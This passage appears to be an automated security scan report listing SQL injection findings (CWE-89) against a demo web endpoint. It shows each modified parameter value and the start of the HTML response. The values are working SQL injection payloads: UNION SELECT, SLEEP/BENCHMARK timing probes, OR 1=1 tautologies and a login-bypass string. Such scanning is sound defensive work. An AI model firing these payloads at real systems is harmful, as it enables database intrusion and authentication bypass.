Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #869\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io'LIKE'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #870\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+\nCHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #871\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),\"'3'\"#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #872\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 16#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #873\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io 1' ORDER BY 1--+\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #874\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io 1234 ' AND 1=0 UNION ALL SELECT 'admin', '\n81dc9bdb52d04dc20036dbd8313ed055\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #875\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 7300=7300 AND 'pKlZ'='pKlY\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #876\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 7300=7300 AND 'pKlZ'='pKlZ\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #877Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioOR 1=1#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #878\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A'\n)),4,5,6,7,8,9--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #879\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #880\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR\n(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(\n116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #881\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX'#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #882\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 